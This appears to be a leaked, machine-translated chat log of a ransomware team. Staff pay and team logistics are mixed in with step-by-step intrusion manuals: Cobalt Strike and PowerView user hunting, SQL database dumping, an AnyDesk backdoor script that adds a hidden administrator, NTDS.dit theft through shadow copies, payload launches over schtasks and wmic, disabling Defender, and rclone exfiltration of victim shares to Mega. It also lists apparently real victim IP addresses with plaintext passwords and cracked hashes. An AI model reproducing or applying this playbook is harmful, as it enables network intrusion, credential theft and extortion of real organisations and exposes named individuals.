What kind of mailing? Is there a mailing list or something?I had a problem with the car, I had trouble restoring it, I had to go back to the car, but I had to go back to the car. I had a problem with the car, all restored. At work, I get into, twin not too lazy, detailed manuals pouredvnikayut work ?Hi there mango lost you @all Hello! Who did not get wages - send in a personal account wallets, the evening will be all! vampiret scripts and description for cobalt, but do not need to yuse them on the cob, the session goes to the slip for 300 sec@jumbo download ``https://www.sendspace.com/file/qwjl9c
Archive password: popo99
here's cobalt 4.3
This is how we ping hosts. Create on your desktop TXT FILE named domains.txt
2. YOU HAVE SORTED OR JUST LOCAL COMPUTER NAMES PUT THEM IN THIS FILE
3. FILL YOUR MACHINE (C:ProgramData) WHICH WILL PING FILE domains.txt and p.bat
4. ENTER p.bat by using shell command
5. After pinging download res.txt file.
The scripts above are for cobalt, please don't use them when on a shared cob. + I will tell you another point about ad_users, there is a lot of information about employees, there you can find technicians, engineers, etc. We usually need ad_users when we want to find admin's car, because on admin's cars we can find passwords from antivirus console, from cloud backups and so on. Now I will send you the USERCHANTER manual, with it we find these cars. Just ad_users, we need to get there SID, for golden ticket, but about this later
1. Make a list of tags
1.1 Open admin_users , find out who we are potentially interested in: admin / engineer / IT
Get the account logins from sAMAccountName
1.2 Get the list of domains admins
1.3 put the first and the second in the file list.txt

2. aploat the powerview.
2.1 powershell-import _/home/user/soft/powerview/view.ps1_
2.1 -comment: import powerview from /home/user/soft/powerview/view.ps1

2.3 Hunting
2.3.1
psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt

instead of 1884 - the PID of the process where we have enough rights to inject.
x64 - or x86 bitrate of the process. see in the tasklist
In cprogramdata\list.txt should lie the list that we did in point 1.
In 5-10-20 minutes you should see the result in out.txt. If the file is 0 bytes then either AB has hit it (if AB has hit it, you will see it in the cob)
See who is working with the database (hosts and users from where you connected to it)
shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses"

1. Display all databases on the server in kmd
shell sqlcmd.exe -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"

with size in megabytes
shell sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"

2. Unload the 100 most saturated tables in the database by number of rows, number of rows and size of tables on disk
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GRCHOUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;"
2.1.
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;"

3. Counting rows in a specific table of a specific database
sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;"

4. Unload the first 10 records in a specific table of a specific database
sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;"
sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W

5. Search by column names in a specific database using %pass% as an example
sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';"

6. Dump the contents of specific columns from specific table into txt file on hard drive in folder (in this example by number value of table > dates
sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s"|" -o "C:\temp\123.txt"
FULL >
sqlcmd.exe -S localhost -E -Q "select * from %databasename%.dbo.%tablename%" -W -s"|" -o "C:\Windows\Temp\1.txt"

7. Output all tables of a particular database
shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W

for remote/other local server change localhost to ip,port
alternatively localhost,%port% (watch netstat)

If a table or database is named with 2-3-4 words - then it is escaped like this [%databasename/tablename%]

sqlcmd -E -S localhost -Q "BACKUP DATABASE databasename TO DISK='d:\adw.bak'"
``Good stuff, I recommend it,`` AnyDesk - read all about it.
 Function AnyDesk {

    mkdir "C:\ProgramData\AnyDesk"
    # Download AnyDesk
    $clnt = new-object System.Net.WebClient
    $url = "http://download.anydesk.com/AnyDesk.exe"
    $file = "C:\ProgramData\AnyDesk.exe"
    $clnt.DownloadFile($url,$file)


    cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent


    cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password


    net user oldadministrator "qc69t4B#Z0kE3" /add
    net localgroup Administrators oldadministrator /ADD
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

    cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id

    }

    AnyDesk


Running the code in Powershell ISE Run As Admin
Get ID
We save it to ourselves
We download Anydesk on a separate virtual desktop and give it an ID.
Press Console Account
Enter password
Quote

    J9kzQ2Y0qO

And then log in with a local administrator or domain account and take advantage of Anydesk
You can also download/download it to the victim's machine, which can be useful for examining and searching documentation point by point.
``````Get access to the server with Shadow Protect SPX (StorageCraft) backups
==
1. RDP access to one of the servers, in my case it is a SQL server.
2. On the desktop, we see the ShadowProtect SPX icon
   -> click on it.
3. the GUI opens (if you are prompted for credentials, enter the credentials under which you signed in via RDP, or any other software)
4. On the left side in the "Job Summary" block you will see the detailed description of backup scheme
   In the "Name" field - backup name of our server
   in the "Destination" field - place WHERE our spx stores backup copies, as BACKUP NAME (BALL WITH BACKUP ON THIS SERVICE)
      From our example we can conclude that all backup files are stored in a ball named StorageCraft, and the folders with backup servers are named with the name of the server itself.
5. Knowing the name of backup server, we want to get more information about his structure, the first thing we do is to get a balloon with the command "cmd.exe> net view \\\COH-DSS3 /ALL", in response we get "Error 5: Access Denied".
6. No access, trying to bang on the accounts of other people - the answer is the same - Error n 5, it would be logical to assume that in order to gain access to the server, we need either the credentials of the local admin on this very server, or account of a special user with special privileges
7. Let's assume that if it is a dedicated user, he has a similar name to the software/function:
   we go through the logins with substrings (here we need to get fancy):
      Storage
      Shadow
      Protect
      Craft
      SP
      SPX
      Backup
      BUUser
      ETC.
   then do a search for ntds.dit (hashes.txt.ntds) to find the hash, in my case, the search was successful and I found the user Humanity.local\SPAdmin (I think it is clear that it is Shadow Protect Admin) and its hash ce31b806821bec116ba03132ab5b3138, but unfortunately, search on cmd5.org not result and I desperately need the clearance. (If you have enough hash, congratulations - you got the result.)
8. But if you still need a clipart or you can not find the right user, we understand that if the software somehow knocked on the server, she knows the credentials, which means they can stay on the server.
   Try to dump hashes
   Here I will not describe in detail how to do it, but you should try hashdump (and its legitimate analogues) and logonpasswords (and similar)
   In my case I used mimic and saved the passwords and found the clirapass from my SPAdmin account - kerberos:
         * Username : SPAdmin
         * Domain : COHBackup
         * Password : Backup!User
    (in my case for some reason the domain was not Humanity.local but COHBackup, although you can also knock with Humanity.local (replace it with your own value))
9. Going into Explorer, and open through it the necessary sphere "\\COH-DSS3\StorageCraft" at me asks for credentials, I enter COHBackup\SPAdmin and Backup!User and successfully get access
10. Also in some networks backup servers can be a few, as an option to check this, is to click on the button Backup in the upper left corner of the gui (just after File) then Destinations -> and we will see what is the way to save the backup
===
`````` add firewall rules
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow
# add to registry new port
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 1350
# powershell
Restart-Service termservice -force

Changing RDP port
``````Installing a metasplot on the VPS


1 apt-get update
apt-get install curl
apt-get install tmux
apt-get install default-jdk
apt-get install postgresql
apt-get install nano
apt-get install gpg
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall
./msfinstall
2
then open

nano /opt/metasploit-framework/bin/msfdb

find and comment on these lines
# if grep -q kali /etc/os-release; then
# echo "Metasploit running on Kali Linux as root, using system database

save CTRL+O
msfdb init
``LittleBig1) Script for collecting balls
2) Script for gathering kerberos
3) Script for hunching admins above adfinder, for collecting ADscript for sorting ADallias for metasploit above ``https://t.me/peass
https://t.me/antichat
https://t.me/thebugbountyhunter
https://t.me/club1337
https://t.me/infosec1
https://t.me/RalfHackerChannel
https://t.me/in51d3
https://t.me/exploithacker
https://t.me/Premium_Hacking
https://t.me/DownloadCourse14
https://t.me/ViperZCrew
https://t.me/techpwnews
https://t.me/cyb3rhunt3r
https://t.me/cveNotify
https://t.me/MalwareResearch
https://t.me/BugCrowd
https://t.me/itsecalert

TG forum list, lots of interesting stuff
``````Some way to Dump NTDS without getting dirty
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt"


query the shaddy listings, there is a date, check if it is a recent date.
They're almost certainly already there, if not, we'll do it ourselves.

net start Volume Shadow Copy
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"


then in the Shadow Copy listing find the most recent one
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55
respectively we need the copy number for the following command


shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\"GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\?


ntds.dit / security / system files should fall into c:\temp\log\
take the portable console 7z and pack it in the archive with password
Code: [Highlight]

7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD


download the password-protected archive to yourself, if you get an error (the file is corrupted) when decrypting the ntds file, then do the following


Esentutl /p C:\log\ntds.dit


the trick of this method is that we do not actually dump anything, we just take and download the ntds
so we don't get caught pulling out the ntds we pack it in a password protected archive

If you have a problem with being burnt and kicked off the network after a ntds dump, try this method
it is possible to burn only by the fact of some leaked date from cd, and it is impossible to analyze what exactly you take without knowing the password from the archive
`````` a stack of manuals on raising rights, for those who don't know English translate here deepl.com

github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet
``````1. YOU HAVE FACE res.txt, OPEN IT IN NOTEPAD++
2.PRESS CTRL+F IN THE SEARCH BOX AND TYPE TTL
3.HIT FIND ALL IN CURRENT DOCUMENT YOU WILL SEE A WINDOW WITH IP AT THE BOTTOM
4. go to en.toolpage.org/tool/ipv4-extractor THEN paste everything you get and get a clean ip
``````How to sort collected AD from the net
1) Download FileZilla


2) Download Putty, put Putty through the torus

Go here torproject.org/download/tor/

Download the WARNING Expert Bundle

Unzip it, go to the Tor directory and run tor.exe

In a few seconds it will reach the message 100% Done

In Putty settings, go to proxy, set sox5, IP 127.0.0.1 port 9050

3) Go to the server via filesilla > go to the directory "Script" - put next to the script AD files

4) Switch to Putty, go to the server, go to the directory where the script is, give the command
./script.sh

5) Finished, go back into FilleZilla and take our sorterd out. Be sure to remove the AD files and the sortertad folder after yourself, if the sortertad folder is not removed, just change it to whatever name you want
`````` HOW TO JUMP THROUGH SESSIONS WITH PAYLOAD

Commands to run peloid, to pull up the session in cobalt
1)shell SCHTASKS /s MS040926754153 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00
2) shell SCHTASKS /s MS040926754153 /run /TN "WindowsSensor15"
3)shell schtasks /S MS040926754153 /TN "WindowsSensor15" /DELETE /F
instead of
MS040926754153
put in
ipac
run through the commands one at a time
1) creating a ride with paiload
2) turn on
3) deleting


Running VMICOM we use it more often
1)If it is a dll, then
shell wmic /node:192.168.104.13 process call create "rundll32.exe C:\ProgramData\x64.dll StartW"

Accordingly, where ipi, insert the ipi of the machine on which we have access, then comes the path and the name of our dll, I think the syntax is clear

If you are on RDP > open CMD as administrator and rundll32.exe C:\ProgramData\x64.dll,StartW you can specify any path according to where your dll is


For EXE format or .bat format, running VMICOM is like this

shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe"
I'll fill it in later. I'll list everything at once ``How to download and what info

1) After we raised the rights, found the Admin Domain, we pull the sesi into the cobalt
2)We put the YES token on and Remove the balls this way :
    *powershell-import - we upload ShareFinder there as usual and give the room the following -
psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt

Next, we study the balls that were taken, and we're interested in
*Financial documents
* Accounting
*Ity
*Customers
*Projects
And so on, it all depends on what our targeting is doing.

Next we do the following > here is the Diablo Manual, everything is easy to understand and understand

Rclone
to start downloading through rclone you need to create a config
to create a config open cmd go to the directory where rclone.exe is
Run rclone.exe with the command: rclone config
choose from the menu new remote
call it mega and enter mega once more
after that we typed the mega mail address after it will ask for a password to enter or generate we will choose yours with the letter 'Y'
the password won't show up on insertion but it's still there
after creating the config you get thrown back to the main menu and you get out of the rclone.
then enter the command rclone.exe config show it will show the config
copy it and create file rclone.conf where we put this information.
when we found the balloons we download the exe and the config to the target machine with the rights to hide the config and the exe so they will not be found
go to the exe directory and give the following command: shell rclone.exe copy "\\envisionpharma.com\IT\\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
where: \envisionpharma.com\IT\KLSHARE are balls
Mega:Finanse is the location of the files in the mega (can create a folder in the mega on its own)
streams 12 --transfers 12 is the number of streams that pump to the maximum (12) is not recommended because you can easily get caught



shell rclone.exe copy "\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3 - here is an example in this case on FTP

!!!RKLON ITSELF WEIGHS ABOUT 50MB, THE LINK TO IT WILL BE BELOW THE POST!!!
`````` GO TO AGENT:
RIGHT-CLICK ON AGENT AND PRESS INTERACT

1) see the list of shell net group "domain admins" /domain

2) domain name shell net view /all /domain

3) LIST the DC shell nltest /dclist: "NameDomain"

4) CHECK THE LIST OF SERVERS
INSTALL THE PowerView MODULE
RIGHT-CLICK on the Get Info > Get Servers Agent
GET LIST OF SERVERS

5) SEE THE LIST OF COMPUTERS
AS THE PowerView MODULE IS ALREADY ENABLED
RIGHT-CLICK on the Get Info > Get All Computers Agent
GET LIST OF COMPUTERS

6) YOU NEED TO FIND OUT PASSWORDS OF ALL DOMAIN ADMINS
RIGHT CLICK ON AN AGENT
CLICK ACCESS > DUMP HASHES
GO TO VIEW > CREDENTIALS
GET ALL HASHES AND LOOK FOR DOMAIN ADMINS

7)WE NEED TO FIND NAS , BACKUP
THIS IS THE COMMAND WE KNOW ALL SUBNETS OF THIS DOMAIN
THIS COMMAND FIND OUT AT WHAT IP ADDRESS IS NAS , BACKUP
portscan 107.191.177.1-107.191.177.255 5000 icmp 1024

A LIST OF USEFUL COMMANDS THAT MAY COME IN HANDY:

Remove AGENT RIGHTS BEFORE DEFOLST rev2self.
turn on the user via the CMD shell net user careadmin /active:yes
USER INFORMATION shell net user careadmin /domain
Turn ON RDP CONNECTION shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control_Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
DISCONNECTING DEFENDER powershell Set-MpPreference -DisableRealtimeMonitoring $true
POLICY REVIEW shell repadmin /syncall /AdeP
SHOW HOME TRUSTS shell nltest /domain_trusts /all_trusts
shell wmic /node: "PC NAME" process call create "COMMAND TO DO"
`````` INITIAL ACTION

1) Unchecking AD - allows us to see how many servers and workstations are on the network, as well as information about users and their positions, and after unchecking AD we sorted it in order to sort out only what we need - we will show it to you later
2) The sharfinder is a way to determine where we have access to this user (to other computers).
3) Kerberos attack - pulls hashes from memory, if successfully removed and successfully decrypted - we are guaranteed domainAdmin
4) If we have system rights, with the command "hashdump" and "logonpasswords" we can pull hashes and mimics and we will have the password of a domain user, and sometimes even the domain admin
5) If we have found a login and hash of the admin domain and we have not been able to hash, we do the following command pth Domain\Admin pass (as hash), using the command shell dir \ip or hostname\c$ we check access to the server or workstations
6) If we find the login\pass domain of the administrator or user, we can put his token, the command looks like make_token Domain\Admin Pass , if you want to remove the token, the command rev2self
7) If the session has a process system , with the getsystem command you can raise the system rights in the session, point (4)
8) Do not forget to watch the processes with the command ps, there you can find the user, migrate to his process > Explore > Process list > then select the user process (the user must be different, not the one in the session) and press inject, select the SSL listener
9) After migrating to the new user you also need to remove balls to see where you can break through with it.
10) When you remove the balloons, at the end of the removal of the directory C:\ProgramData and there is sh.txt or shares.txt, download it and see how many "remote admin" in the textbook, if there is more than one, it means that you have access to another computer
11) Click on session > File Browser > write path\ypie or hostname of the computer you have access to\c$ , put there peloid, I will give it to you later
12) Launch the package depends on its format eh or dll, I will explain later personally
13) To ping the server and workstation, we need p.bat, I will throw it in the group. Create a txt file, call it domains.txt, put there hostnames servers or minutes. Hostnames are taken from the withdrawn AD, with the script, they will show how to use
14) If you found a password, you can also run it through smb_login - an instrument in metasploit, I will give a metasploit and tell you how to use it. smb_login will show which servers or woks, have access to these scripts
``Manuals_team_Boyfriends who did not get the weekend zp write to pmbudet*she all budtrebyatki who I get zp send walletsPrietPrivet viemprivetperevet🖐privetprivetnetmanPrietPrivetprivetvsvsvetgorec_SupportgorecHi all! Guys who are newly connected to the chat - send in pm their backup jabbers in case the rocket gets tired, so as not to lose anyone. Just need the number from which work, who's team leader and what to pay agreed to. Thank you! Armitage Teamserver Setup by Graf
1. Install the metasplot
	curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
		
		; ./msfconsole run the metasplot

2. Install Postgresql
	
	apt-get -y install postgresql
	
3. Installing and unpacking Armitage

	wget http://fastandeasyhacking.com/download/armitage150813.tgz
	tar zxvf armitage150813.tgz

4. Create a user and give him sudo rights

	adduser %username%
	usermod -aG sudo %username%

5. Initialize the metasplot database from the newly created user and export MSF_DATABASE_CONFIG with the .yml address obtained during initialization

	msfdb init

		; msfdb reinit - Deletes and reinitializes the database.
		; msfdb delete - Deletes the database.
		; msfdb start - Starts the database.
		; msfdb stop - Stops the database.
		; msfdb status - Shows the database status.

	export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml

6. Launch Armitage Teamserver

	cd /path/to/armitage
	./teamserver [external IP address] [password]
	

Useful Links

	Installing the Metasploit Framework -
		https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
	Armitage installation -
		http://www.fastandeasyhacking.com/manual

* This guide assumes that you already have experience working with *unix systems and you will be able to deal with difficulties arising in the process.
Write to pm for life, @all guys, is there anyone sitting on a fresh cob? Go to me for nets. If you have a clean cobaltjohnnuggetsribe donald, opishee pm how will youribe donald, opishee pm how will youdonaldWell, you can send in pm purse and the amount in bets to pay:) and your duties (coder, admins what project, etc in short) All Hello! Guys, today / tomorrow payroll, so who recently started - send in a personal note the date from which you work, external backup gibber and who is your team lead. Who is not in the list - wages will not get:) Happy Monday to everyone :) otherwise there will be confusion.
Guys, under team leader, put me
Hello Something new, if we have our internal toad - it too so please all these citizens to send me in the PM your nickname, external jobber (any public will do, as a backup means of communication, in case the rocket breaks), who's your team lead and from what date work I will give salary to those of you who wage all local@all guys who have not received zap yet write in the personal message please super!)@all Hello All, send wallets in a personal message for wages. Those who receive wages from me :) @all Hello, everyone who zp I get - write in the personal kosh@twin bros are you going to work? I have a lot of things to tell you about my work, but I have to tell you in person.
vnjSxzeBkX8N4kJ2y2VgNoLhwx1u8q34G8Ibnh27E2h0leAvJzPlCuOxENCbVw50
``Nation, need new servers koba and not only, the old cuts the traffic. Who to order from? Hey bro, on the zp have any info? @all Hi all! who gets zp from me - write in person kosh+senku bro, study@all gang, study conf conf conf manualsvampirLittleBigjumbotwinall Hi! Sorry for the delay, who online - write in person on the zp
"it's all coming up" (s)+forum wars
cheating
and everything about the pub - we all do not care, friends, watch yourself, the train can come for anyone who does not think with his head, remember how you read other people's mail - they can read, and you're sorry for the "orderly tone"
but this isn't a telegram channel for little hackers
I hope everyone understands. It's not our topic. We've forgotten.
"Chocolate is not to blame "period.I STRONGLY recommend that I write to pm if there are people here who were the adverts of the software, stop right here and now the discussion of this event + Yes, the news is one thing, and what is there in practice is not clear yet yoyu interview with them where they said that I have access to nuclear missiles. Well a lot of red lines were crossedRevil is partner software, where a lot of people localize what comes into your headDon't worry, everything is fine.  All the best to you and your loved ones and most importantly health and happiness, and we'll steal more money. If anyone wants to work on the yng, i'm here for the holidays, there are cases) after the holidays will be a global updatd here all of us and more will guys who have cobalt crypto at hand? pick up the targetet it only for our so understoodmrFlintstoneeldoradografalexspoonsonarstakantwinpiperryfuryAir guys do we have a rocket that starts with https://6yp ? In torey who has armitage ? share the plies and then their off site is lyingDi11erHi all guys who have recently joined the chat - send in pm their backup jabber in case the rocket will get tired, so as not to lose anyone. Just need the number from which work, who's team leader and what to pay agreed to. Thank you! Hi, I could not get into this chat, reverse helped, now all is wellHow are you doing? Hi@all now this one is pulling
https://www.zoominfo.com/c/Wyndham-hotels-resorts-inc/117882918
  Revenue: 2kkk
  98.174.166.162:10443

  MelissaDunkle : Rose2016
  DougClagg : Kaelynlyn1

If you can't tomorrow afternoon, let's see what you're doing wrong, try it again.
you have a virtual computer on the deck, just do not knock, no error and on it raise the VPN and the virtual computer with the bridge Deploy the virtual computer as it should on the virtual computer and what she writes it does not come?we can't get it from there and we can't send it to the coba so raise the VPN on the virtual desktop and raise the VPN on your virtual desktop, everything is ok, even on http does not let on the web i will think of something either today or tomorrowWhy, i'm busy now i'll send you the heloide here Let me do it from mineTried to create a virtual machine on the rods, the same situationvpn up, the rods are not pulling The rods are not pulling to the kobaNo jumped?and how's it going? @twin where's the channel?
  
3. https://www.zoominfo.com/c/Wyndham-hotels-resorts-inc/117882918
  Revenue: 2kkk
  98.174.166.162:10443

  MelissaDunkle : Rose2016
  DougClagg : Kaelynlyn1
  
  
4. https://www.dnb.com/business-directory/company-profiles.autopistas_del_sol_sa.92b12328da08fa19d4c395e60f909f75.html

200.105.84.66:10443

avillaverde : ViniciuS2020$
avillaverde : ViniciuS09$
``Friends, who has a Windows 7 image? Hi guys, who recently started - send a date in the personal list, with which you work, external backup jabber and who is your team lead,
And your duties (coder, admin what project, etc. in brief)Ііq51B↩vidtautorvalte guys share juxtaposition in pm pliz)brusshelsheskurrivet:metal:we are a legion)and we are more and more, I ooooochee like it:zany_face:Hi)¼argauWell, hello! Send a purse and the amount of btz to zp in pm! dark@all brothers for technical reasons zp postponed to the IPA. Please do not worry, the IPA will be all ironclad, hang BTC, and since the weekend ahead - most likely to postpone the IPA. If anything comes before then I'll let you know right away. If it comes tomorrow - I'll be in touch all weekend! I have not heard anything for a long time, ask mangostevenWho's your team leader?
maybe know what the lull? click@alter @steven @Air oursaga )LittleBigstickjumbo Happy New Year, colleagues! Vas toze vsech s nastupaeshim !!))`)
HAPPY NEW YEAR !!! I WISH YOU HEALTH, EVERYTHING ELSE WILL BUY !
Happy New Year to everybody! I want to wish everybody the best, and most importantly health to you and your loved ones. And that everything goes up - from rights to you know what)))) Happy New Year to all. And by the way - there are cases) go to the coba who would be bored) With a Happy New Year!!! All the best in the new year!! With a Happy New Year everyone! Good luck to all.klaxonprizrakaga )+respect cryptorukpt good everything flies without a problem then there will be confusion ``.
Guys, in the teamlead box, put me
If there is our internal toad - its too,ask all such citizens to send me in PM your nickname, external toad (any public will do, as a backup means of communication, in case the rocket breaks), who's your Team Lead and from what date work I will issue wages to those of you who are on salary to all local guys who are in touch send wallets in privatedobavim@Air @steven do not forget to throw in the confab, again I see that the confab is, but I'm not in it) completeportables.com ? I don't see a case like that@all
```
ZI3Qfg81dEJOrKaNwID6EKW799vXK105jxI2jZIKpitmcf7f6hbqEkxtKqZhudV
```
Who is it? Peace to all local:nerd:All new joiners need to unsubscribe me in person so I put you on the balancevshe Hi! Bros plan to pay either tonight or tomorrow, as will be the news I myself otpisuyut all) and your duties (coder, admin what project, etc in short) All Hey! Guys, today / tomorrow pay, so, who recently started - send a date in a personal letter, which work, the external backup gibber and who is your team lead. Who is not in the list - wages will not get:) All have a Monday :) klahonvirtulku pickupparni how to remove the hell if the av just immediately rubs files in progodate. av - santinel. targeting at 8kkk) is there anyone to help?) ok all found all spsdlya stop what services need batinok? @all give batik to stop services plyz!!mangomne need to go away for 1-2 hours and will be until morningfiksanem otpisuyu so far fixingparni files through sendspacevampirLittleBigstickjumbo after the holidays will be a global updatd here all of us and still willparni who has a cobalt crypto at hand? pick up should targetetetetet only for ours I understandmrFlintstoneeldoradografalexspoonsonarstakantwinpiperperryfuryAiralterstevenadmin_IRYmQv2EnHjaxtesttesttest_uplodarbakadonaldAll hello! I can send in pm purse and the amount in bets to pay :) Hi, who gets my zp write in personaliiloparni who have not received in the weekend zp write in pmpantsantra, if you need decrypts hashes hiding passes and you need ClearText you can apply ... I own a modest farm for Hashcat on 2xRTX2080Super. I will be glad to help you.
(
Hash - NTLM/SHA1/MD5/NTLMv2/DCC2/...

example result
  YourHash:Password
0edca1229618638065b944e8b8fc6b7e:dadandmum18
a0d31f5b27ec38230c4d4810b7a62684:Astrology1@
a50e613d30c6f5b3b7d923349328fc3b:akusayang08
)
   RanXerox,
   Send me a Fax, use RanXerox! HiHELLOU to all of you!!! martinloveok in an hour we will come to look at the load there is installed there fortyclientaga okSOVA://209.222.101.242:64132
P4C3aATy1mkUlTkTvOhTDwFl2SoRwFUoSMm139 298 679|qp48ihqq - ıtvıverlıtem cobu access and tym on ddik putin 7 or 10cu on ddik virtualku liftDo, we can not pull up to cobu jump?let's try what ?www.wyndhamhotels.com_TEAM_СС new 2022 !!!
🥳:grin:[ ](https://xerela.com/channel/general?msg=k6wP9ptCx53so36GG) :v: :grin:Happy New Year, survivors))))) also on the car is logmeaga and as the weather closes the client and go to@eldorado you have another write back I write you in the torus no luck? search for the key name of the user and you? Brother, what is it with you and have a script in the cob that would pull it off?the registry I understand, but where on the machine is the file where it is stored and steven, I need you on another topic )))) it stores if there is a tick to remember on the connection does anyone know if WIN7 stores passwords somewhere from the connection? yes those lumineers lard? domain is there) yes it would be logical so where to get the username and passwords so they domain probably asks the creeds) 0_0create) VPN connection creates?let me see the config in the windup directly into the connection where to import? there is no client it importsnu let me see the config let me see there is a key, no crid) o_o I still spied it az com)? i missed something so what kind of VPNN wrote tebeklient no, there is a script + batnickam just a VPN imported into the connectiona very large conkrito write to the toad@eldorado what kind of VPN client?there are a number of questions, how to enable keylogger. where in win 7 are stored passwords from VPN connection. serts stolen, need to get passwords and is it possible? preferably immediately the amount and kosh :) hi All! Who gets my salary - write in person :) _Patsantre_ , well, what's the zoo?

Who taught you how to read?
I'm a kind, good guy who allows you to use cheats, i.e., to chase your
Hash on my GPUs and dictionaries, which don't take five minutes to compile...

Just one thing, please don't complicate my work.... If NTLM, NTLM and Md5/sha1/\'some us\'...

`FORMAT user hash
```
MD5 aperia 4c1874760fb49ebdabadd6cc4232ed7b1
NTLM miriam 669bfafdb4990fe1c953f8ac5a15586d
SHA1 luke 8a233d0252d2c659b3a26cf4cf25d59d409615ab
```
And here's the kicker - it's DCC2 (I fucked them!)
`$DCC2$10240#techpilonm#a056cd163d1edf16d4827d2b0dd5945a:%TGB4rfv`


Here are the speed stats:

```
MD5 80696.7 MH/s [ 84616622899 tries/sec ]
Sha1 26210.2 MH/s
NTLM 134.0 GH/s
DCC2 1044.4 kH/s

BitcoinWallet 17111 H/s [ 17111 attempts/sec ]
```

If I still have to chase that config does not brute force something because again MD5, I think it's a shame.
***
[serviceman's voice](https://hashes.com/en/tools/hash_identifier)
Go in, check it out, throw.... Ah site is also provided with their database piercing service...
([Decrypt](https://hashes.com/en/decrypt/hash) like to call it)

_here's more
`https://crackstation.net/`
`https://md5decrypt.net/en/Ntlm/`
`https://md5decrypt.net/en/`
`https://md5hashing.net/hash`
`https://www.cmd5.org/`
[Cloudtopolis - if you want to fuck with me](https://github.com/JoelGMSec/Cloudtopolis)


So # ATTENTION !!!

FORMAT user hash
sps@twin how's it going ? Hey everyone, the plan is to ST tonight / tomorrow morning, as soon as - I will immediately write to all. Please have a little patienceinvictussmokeNeed a clean coba - targetets 1kk and250k now online_Patsantre_ , well, what's the zoo?

Who taught you how to read?
